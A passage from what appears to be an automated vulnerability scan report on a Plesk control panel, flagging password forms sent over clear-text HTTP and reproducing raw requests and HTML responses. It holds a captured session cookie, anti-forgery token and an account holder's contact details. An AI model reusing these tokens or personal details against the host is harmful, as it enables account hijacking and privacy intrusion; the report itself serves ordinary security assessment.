The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/mail-list/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:49 GMT
Connection: close
Content-Length: 15608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create Mailing List - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/mail-list/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmail-list%2Fcreate%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/mail-list/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create Mailing List</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-nal-maillist" enctype="application/x-www-form-urlencoded" action="" method="post">

<div class='form-row'>
<div class='field-name'>
<label for='listName'>Mailing list address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="listName" id="listName" value="" class="input-text" /> @
<select name="domainId" id="domainId">
<option value="1" label="nosedivesailing.com" selected="selected">vulnerable.host.fqdn</option>
</select> </span>
<div class="field-errors" style="display: none;"></div>
</div>
</div>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="enabled" value="0" /><input type="checkbox" name="enabled" id="enabled" value="1" checked="checked" class="checkbox" />
<label for='enabled'>Switched on&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='administratorEmail-form-row' class='form-row' >
<div class='field-name'><label for='administratorEmail'>Mailing list administrator's e-mail&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="administratorEmail" id="administratorEmail" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='password-form-row' class='form-row' >
<div class='field-name'><label for='password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="password" id="password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="passwordConfirmation" id="passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='subscribers-form-row' class='form-row' >
<div class='field-name'><label for='subscribers'>Subscribers&nbsp;</label></div>
<div class='field-value'>

<textarea name="subscribers" id="subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="notify" value="0" /><input type="checkbox" name="notify" id="notify" value="1" checked="checked" class="checkbox" />
<label for='notify'>Notify administrator on the mailing list creation&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
</div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/mail-list/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-nal-maillist',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
